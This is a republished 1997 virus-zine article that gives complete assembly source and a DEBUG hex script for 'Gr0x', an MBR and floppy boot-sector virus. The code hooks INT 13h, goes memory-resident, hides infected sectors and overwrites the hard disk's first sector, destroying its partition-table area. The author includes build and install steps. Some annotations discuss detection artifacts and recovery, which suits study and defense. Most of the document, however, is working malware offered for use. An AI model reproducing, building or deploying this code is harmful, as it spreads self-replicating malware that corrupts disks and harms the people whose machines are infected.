
SLAM3.009: MBR/BS Infector ]Gr0x[ by DC [SLAM]

Published in 
Slam
 · 24 Feb 2022

]Gr0x Virus[


This virus infects the MBR of hard disks and the BS (boot sector) of 1.44 MB floppy discs
The original MBR is stored at CHS (cylinder,head,sector) 0,0,2 and the original BS at CHS 0,1,14
Stealth for the BS on read (the read is redirected to the original sector)
Stealth for the MBR on write/read/verify...

I can't write a multipartite virus because of the low space: only 512 bytes (the size of one sector) :(

Compile with A86 v4.2 and put the virus in sector 1 head 0 track 0 of a 1.44 floppy disc! and original boot sector on 0,1,14

        org 0h ; assembled at offset 0 but loaded by the BIOS at 0000:7C00, so every data
               ; reference made before the copy to the resident segment carries +7C00h

jmp short grox ; Short Jump to start (EB 3B in the hex dump below)
db 3bh dup(0) ; Original Floppy Stuff: 3Bh zero bytes reserved at offsets 3..3Dh; floppy_infect
              ; overwrites them with the victim boot sector's bytes 3..3Dh (presumably the OEM
              ; name / BPB so the disk stays readable - not stated on the page)
grox:
; --- boot-time entry: runs at 0000:7C00 with cs=0 ---------------------------------
; Register use in this block: ds=es=0, si=7C00h (also loaded into sp).
; Data references carry +7C00h here because the image was assembled at org 0.
cli
xor ax,ax ; AX=DS=ES=0
mov ds,ax
mov es,ax
mov si,7c00h ; SI=7C00h
mov sp,si ; SP=SI: stack grows down from just below the loaded sector
sti

; Step 1: try to infect the first hard disk straight from the boot code.
mov ax,201h ; ah=02 read, al=01 one sector
mov cx,1 ; cylinder 0, sector 1 (the MBR)
mov dx,80h ; head 0, drive 80h (first hard disk)
mov bx,offset buffer+7c00h ; into 0000:7E00 (buffer is the label right after this sector)
int 13h
jc next1 ; no hard disk / read error: skip infection, still go resident

cmp word ptr es:[bx+offset mark],'G[' ; Infected? compares the word at the mark offset of the
                                      ; read MBR with 5B 47h ('[G', the first two bytes of the
                                      ; credits string - see the hex dump)
je next1 ; yepz, next

mov byte ptr cs:[disc][7c00h],0 ; disc=0: the image about to be written is a hard-disk copy

mov ax,202h ; Write 2 Sectors
inc ah ; ah=03 (write), al=02: 1st sector = my virus (0000:7C00), 2nd = original MBR (0000:7E00)
mov cx,1 ; cylinder 0, sector 1 gets the virus, sector 2 the original MBR
mov dx,80h ; head 0, drive 80h
mov bx,7c00h
int 13h ; NOTE: no error check on this write
; Impact: the whole 512-byte image replaces sector 1, including offsets 1BEh..1FDh where a
; DOS-style MBR keeps its partition table (in the hex dump that range is 90h filler). The only
; intact copy of the original MBR is then 0,0,2; recovery means restoring sector 1 from
; 0,0,2 after a clean boot, not merely clearing the boot code.

mov byte ptr cs:[disc][7c00h],1 ; back to the floppy mark (1) for the copy still in memory
next1:
; Step 2: go resident. si is built as (0 xor 400h) + 13h = 0413h, the BIOS data area
; word holding the conventional memory size in KB (the roundabout arithmetic is what
; the author's "ANTi-TBAV" remark refers to).
xor si,si ; routine to make
xor si,400h ; resident. ANTi-TBAV
add si,013h ; si = 0413h
dec word ptr ds:[si] ; take 1 KB off the top of conventional memory
mov ax,ds:[si] ; ax = new size in KB
shl ax,6 ; KB * 64 = segment of the stolen kilobyte
mov es,ax ; ES=New Segment (the resident copy lives here)
; Detection artifact: 0040:0013 reads one KB lower than the machine's real size while resident.

mov ax,word ptr ds:[13h*4] ; Get the original INT 13h vector from the IVT (0000:004C)
mov word ptr [i13][7c00h],ax ; offset -> i13 (also the operand of the far jump / far call below)
mov ax,word ptr ds:[13h*4][2]
mov word ptr [i13][7c02h],ax ; segment -> i13+2

mov word ptr ds:[13h*4],handler ; Put the new interrupt
mov word ptr ds:[13h*4][2],es ; handler: INT 13h now points into the resident copy
; Detection artifact: the INT 13h vector segment equals the new 0040:0013 value * 64,
; i.e. the first paragraph above the reported conventional-memory top.

mov si,7c00h ; copy the virus to
mov cx,100h ; my segment: 100h words = 512 bytes, 0000:7C00 -> es:0000
xor di,di
rep movsw

; Step 3: choose the CHS of the saved original boot record according to the boot medium.
mov cx,0eh ; floppy: cylinder 0, sector 14
mov dx,100h ; head 1, drive 0
cmp byte ptr cs:[disc][7c00h],1 ; it's a floppy???
je floppy
mov cx,2 ; hard disk: cylinder 0, sector 2
mov dx,80h ; head 0, drive 80h
floppy:
push es ; jump to the copy
push continue ; of my virus in memory
retf ; far jump to es:continue; from here cs is the resident segment and
     ; cs-relative labels need no +7C00h
continue:
xor ax,ax
mov es,ax
mov ax,201h ; Read original BS/MBR
mov bx,7c00h ; to 0000:7C00 (replacing the boot-time image of the virus)
call int13h ; through the saved original vector, bypassing the hook just installed
            ; NOTE: no error check; on failure whatever sits at 0000:7C00 (presumably
            ; still the virus image) is what gets jumped to next

push es
push bx
retf ; Jump to original MBR/BS (far jump to 0000:7C00)
handler:
; --- resident INT 13h hook (cs = stolen segment) -----------------------------------
; Filter: only requests for cylinder 0 / sector 1 / head 0 are of interest; every other
; request is passed straight through to the original BIOS handler.
cmp cx,1 ; Sector 1? (cx = cylinder 0, sector 1 exactly)
jne return
cmp dh,0 ; Head 0?
jne return
cmp dl,80h ; Hard Disk? any function (read/write/verify/...) on the MBR is redirected
je mbr_stealth
cmp dl,1 ; floppy? only drives 0 and 1
ja return
cmp ax,201h ; read one sector? (ah=02, al=01) -> infect-or-stealth path
je floppy_infect
return:
db 0EAh ; opcode of JMP FAR ptr16:16; the operand is the i13 word pair below, patched at
        ; install time, so this is a tail jump to the original handler (its IRET returns
        ; to the caller; the hook leaves no frame of its own)
i13 dw 0,0 ; original INT 13h vector: offset, segment (also the target of int13h's far call)

mbr_stealth:
; Any INT 13h request aimed at hard-disk CHS 0,0,1 is moved one sector along, to the saved
; original MBR at 0,0,2. Reads therefore return the clean MBR (stealth); writes and verifies
; land on the backup too, so rewriting sector 1 while the virus is resident (a repair attempt)
; only updates the copy at 0,0,2 and leaves the infected sector untouched. Inspect or
; repair the MBR only after a clean boot.
push cx

mov cl,2 ; redirect to original MBR sector
int 13h ; re-enters handler with cx=2, which falls through to the original BIOS code

pop cx ; caller's cx restored; pop/retf do not touch flags, so the BIOS's CF survives
retf 2 ; return far and drop the flags word the caller's INT pushed

floppy_infect:
; Reached for ah=02/al=01 reads of floppy (dl=0/1) CHS 0,0,1, i.e. any read of a floppy's
; boot sector. The read is carried out through the original BIOS; the disk is then infected
; if it is not already, and in either case the caller's buffer is refilled with the clean
; boot sector kept at 0,1,14 (read stealth). dl is never modified here, so every write
; below goes to the drive the caller asked about.
call int13h ; perform the caller's read via the saved original vector
jc read_error ; read failed: return to the caller with CF set, nothing else done

pushf ; flags of the successful read (CF=0) - these are what the caller gets back
push ax, bx, cx, si, di, ds, es ; A86 multi-operand push; ax holds the BIOS result of that read

mov word ptr cs:[_es],es ; remember the caller's buffer es:bx
mov word ptr cs:[_bx],bx

cmp word ptr es:[bx+offset mark],'G[' ; infected? same two-byte marker test as at boot time
je floppy_stealth

; Not yet infected: first save the original boot sector to 0,1,14 ...
mov ax,301h ; write original BS (ah=03 write, al=01 one sector, from es:bx)
mov cx,000eh ; on 0,1,14: cylinder 0, sector 14
mov dh,01h ; head 1
call int13h
jc floppy_exit ; write failed (e.g. write-protected): caller keeps the real sector, no stealth
; NOTE: whatever was stored at 0,1,14 is overwritten without being checked or saved.

mov byte ptr cs:[disc],1 ; floppy marker! (the image written below will boot as "from floppy")

push es ; ds = caller's buffer segment (copy source)
pop ds
push cs ; es = resident segment (copy destination)
pop es

lea si,[bx+03h] ; copy the floppy stuff: bytes 3..3Dh of the victim's boot sector
mov di,03h ; into the same offsets of the resident image (the dup(0) area after the jmp);
mov cx,03bh ; presumably the OEM name / BPB so the disk stays usable - not stated on the page
rep movsb ; this permanently alters the resident copy, which later infections inherit

xor bx,bx ; write my virus... es:bx = cs:0000, the (now patched) 512-byte image
mov ax,301h ; ah=03 write, al=01 one sector
mov cx,1 ; cylinder 0, sector 1
xor dh,dh ; head 0; dl still the caller's drive
call int13h ; NOTE: no error check on the write of the infected sector

floppy_stealth:
; Already infected (or just infected): hand the caller the clean sector from 0,1,14.
mov es,word ptr cs:[_es] ; caller's buffer
mov bx,word ptr cs:[_bx]
mov ax,201h ; read the original BS
mov cx,0eh ; cylinder 0, sector 14
mov dh,01h ; head 1
call int13h ; NOTE: its CF is lost below, popf restores the first read's flags
floppy_exit:
pop es, ds, di, si, cx, bx, ax ; reverse order of the pushes above
popf ; flags saved after the first read, so the caller sees CF=0 on this path
read_error:
retf 2 ; return far! (drop the flags word the caller's INT pushed)

int13h:
; Call the original BIOS INT 13h directly (pushf + far call, roughly what an INT does),
; bypassing the hook installed by this code. The cs: override matters because ds is
; whatever the caller left it.
pushf
call dword ptr cs:[i13]
ret

; --- data (offsets per the hex dump: mark 177h, disc 1A0h, _es 1A1h, _bx 1A3h) ----------
mark db '[Gr0x Virus] (c) 1997, Dark Chakal [SLAM]' ; my little credits...
; Detection: this plaintext string sits in every infected sector; its first two bytes
; ('[G') are the infection marker both infection routines test for.
disc db 1 ; boot-medium flag: 1 = floppy (default, floppy copies), 0 = hard-disk copy
_es dw ? ; scratch: the caller's es:bx saved by floppy_infect
_bx dw ?

org 510 ; pad up to the boot signature (A86 filler; 90h in the hex dump), so offsets
        ; 1A5h..1FDh carry no data - including the range an MBR keeps its partition table in
dw 0aa55h ; end of sector marker! (boot signature)
buffer: ; c00l buffer ;) - label at offset 512, nothing assembled here: at boot time
        ; buffer+7C00h = 0000:7E00 is the read target, the 512 bytes after the loaded image

=====cut here=================================================================

N GROX.COM
E 0100 EB 3B 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
E 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 FA 33 C0
E 0140 8E D8 8E C0 BE 00 7C 8B E6 FB B8 01 02 B9 01 00
E 0150 BA 80 00 BB 00 7E CD 13 72 25 26 81 BF 77 01 5B
E 0160 47 74 1C 2E C6 06 A0 7D 00 B8 02 02 FE C4 B9 01
E 0170 00 BA 80 00 BB 00 7C CD 13 2E C6 06 A0 7D 01 33
E 0180 F6 81 F6 00 04 83 C6 13 FF 0C 8B 04 C1 E0 06 8E
E 0190 C0 A1 4C 00 A3 F4 7C A1 4E 00 A3 F6 7C C7 06 4C
E 01A0 00 DA 00 8C 06 4E 00 BE 00 7C B9 00 01 33 FF F3
E 01B0 A5 B9 0E 00 BA 00 01 2E 80 3E A0 7D 01 74 06 B9
E 01C0 02 00 BA 80 00 06 68 CA 00 CB 33 C0 8E C0 B8 01
E 01D0 02 BB 00 7C E8 99 00 06 53 CB 83 F9 01 75 14 80
E 01E0 FE 00 75 0F 80 FA 80 74 0F 80 FA 01 77 05 3D 01
E 01F0 02 74 0E EA 00 00 00 00 51 B1 02 CD 13 59 CA 02
E 0200 00 E8 6C 00 72 67 9C 50 53 51 56 57 1E 06 2E 8C
E 0210 06 A1 01 2E 89 1E A3 01 26 81 BF 77 01 5B 47 74
E 0220 2F B8 01 03 B9 0E 00 B6 01 E8 44 00 72 37 2E C6
E 0230 06 A0 01 01 06 1F 0E 07 8D 77 03 BF 03 00 B9 3B
E 0240 00 F3 A4 33 DB B8 01 03 B9 01 00 32 F6 E8 20 00
E 0250 2E 8E 06 A1 01 2E 8B 1E A3 01 B8 01 02 B9 0E 00
E 0260 B6 01 E8 0B 00 07 1F 5F 5E 59 5B 58 9D CA 02 00
E 0270 9C 2E FF 1E F4 00 C3 5B 47 72 30 78 20 56 69 72
E 0280 75 73 5D 20 28 63 29 20 31 39 39 37 2C 20 44 61
E 0290 72 6B 20 43 68 61 6B 61 6C 20 5B 53 4C 41 4D 5D
E 02A0 01 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90
E 02B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
E 02F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 55 AA
RCX
0200
W
Q

=====cut here=================================================================
